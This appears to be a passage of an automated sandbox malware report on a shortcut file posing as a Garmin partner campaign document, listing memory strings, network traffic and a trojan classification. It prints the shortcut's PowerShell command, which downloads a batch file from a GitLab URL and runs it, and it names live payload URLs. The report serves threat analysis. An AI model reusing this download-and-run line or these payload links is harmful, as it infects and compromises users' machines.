https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: gitlab.com
Source: global traffic	DNS traffic detected: DNS query: www.dropbox.com
Source: global traffic	DNS traffic detected: DNS query: uc17b8d8bd17bcf3ea55ad3892e7.dl.dropboxusercontent.com

Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edge-block-www-env.dropbox-dns.com
Source: powershell.exe, 00000011.00000002.3322903570.000001C85A718000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://gitlab.com
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD8D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2239511699.00000210EBF7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2239511699.00000210EC0C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3373943030.000001C8692A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3373943030.000001C86915F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3322903570.000001C85AB77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000011.00000002.3322903570.000001C859322000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DBF11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3322903570.000001C8590F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://uc17b8d8bd17bcf3ea55ad3892e7.dl.dropboxusercontent.com
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www-env.dropbox-dns.com
Source: powershell.exe, 00000011.00000002.3322903570.000001C859322000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.dropbox.com
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://a.sprig.com/
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/gsi/client
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DBF11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3322903570.000001C8590F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.login.yahoo.com/
Source: powershell.exe, 00000011.00000002.3322903570.000001C85A718000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://app.hellofax.com/
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://app.hellosign.com/
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://canny.io/sdk.js
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cfl.dropboxstatic.com/static/
Source: powershell.exe, 00000011.00000002.3322903570.000001C85A718000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://collector.prd-278964.gl-product-analytics.com
Source: powershell.exe, 00000011.00000002.3322903570.000001C85AB77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.3322903570.000001C85AB77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.3322903570.000001C85AB77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://customers.gitlab.com
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl-web.dropbox.com/
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/fsip/
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/fsip/
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/fsip/
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.sandbox.google.com/document/fsip/
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docsend.com/
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://experience.dropbox.com/
Source: powershell.exe, 00000011.00000002.3322903570.000001C859322000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000011.00000002.3322903570.000001C85A713000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3322903570.000001C859D22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com
Source: powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/-/sandbox/
Source: powershell.exe, 00000011.00000002.3322903570.000001C85A718000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/-/sandbox/;
Source: powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/-/speedscope/index.html
Source: powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/admin/
Source: powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/assets/
Source: powershell.exe, 00000011.00000002.3322903570.000001C85AB6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3322006649.000001C8575C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/stare2/garmin/-/raw/main/fuknew1112.zip
Source: 3_Garmin_Campaign Information for Partners(12-11).docx.lnk.download.lnk	String found in binary or memory: https://gitlab.com/stare2/garmin/-/raw/main/garsukhjdf11.bat
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DCB43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3322903570.000001C859D22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://help.dropbox.com/
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.yahoo.com/
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://navi.dropbox.jp/
Source: powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://new-sentry.gitlab.net
Source: powershell.exe, 00000011.00000002.3322903570.000001C85A718000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_env
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD8D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2239511699.00000210EBF7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2239511699.00000210EC0C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3373943030.000001C8692A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3373943030.000001C86915F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://officeapps-df.live.com
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://officeapps.live.com
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/picker
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pal-test.adyen.com
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paper.dropbox.com/
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.dropbox.com/
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sales.dropboxbusiness.com/
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
Source: powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sentry.gitlab.net
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://showcase.dropbox.com/
Source: powershell.exe, 00000011.00000002.3322903570.000001C85A718000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://snowplow.trx.gitlab.net
Source: powershell.exe, 00000011.00000002.3322903570.000001C85A718000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sourcegraph.com
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uc17b8d8bd17bcf3ea55ad3892e7.dl.dropboxusercontent.com
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uc17b8d8bd17bcf3ea55ad3892e7.dl.dropboxusercontent.com/cd/0/get/CgE6CtD6YCSomLayRqankLpMZ4hK
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.docsend.com/
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD52D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DCB43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/page_success/
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/pithos/
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/playlist/
Source: powershell.exe, 0000000F.00000002.2243795126.00000210F4140000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/f
Source: powershell.exe, 0000000F.00000002.2243275004.00000210F3F92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/scl/fi/4p5pc2fbhxx70q
Source: powershell.exe, 0000000F.00000002.2224098465.00000210D9E60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.doc
Source: powershell.exe, 0000000F.00000002.2243734799.00000210F4060000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/garmin_campaign_information_for_partners_v3.doc
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/service_worker.js
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/static/api/
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/static/serviceworker/
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/v/s/playlist/
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropboxstatic.com/static/
Source: powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/ns.html
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3322903570.000001C85A718000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hellofax.com/
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hellosign.com/
Source: powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.paypal.com/sdk/js
Source: powershell.exe, 00000011.00000002.3322903570.000001C85A73C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.recaptcha.net/

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726

Source: unknown	HTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.65.18:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.6:49726 version: TLS 1.2

System Summary

Windows shortcut file (LNK) contains suspicious command line arguments

Source: 3_Garmin_Campaign Information for Partners(12-11).docx.lnk.download.lnk

LNK file: /c powershell -Command "$h='https://gitlab.com/stare2/garmin/-/raw/main/garsukhjdf11.bat'; $p=$env:TEMP+'\Updates.bat'; iwr $h -OutFile $p;start $p"

Source: C:\Windows\System32\cmd.exe	File created: C:\Windows\System32\tmp			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File created: C:\Windows\System32\tmp			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFD348B24CA	15_2_00007FFD348B24CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFD348B6321	15_2_00007FFD348B6321
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFD349820CE	15_2_00007FFD349820CE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFD348A4712	17_2_00007FFD348A4712
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFD348A0D60	17_2_00007FFD348A0D60

Source: classification engine

Classification label: mal100.troj.evad.winLNK@32/17@4/2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\Document.zip

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6500:120:WilError_03

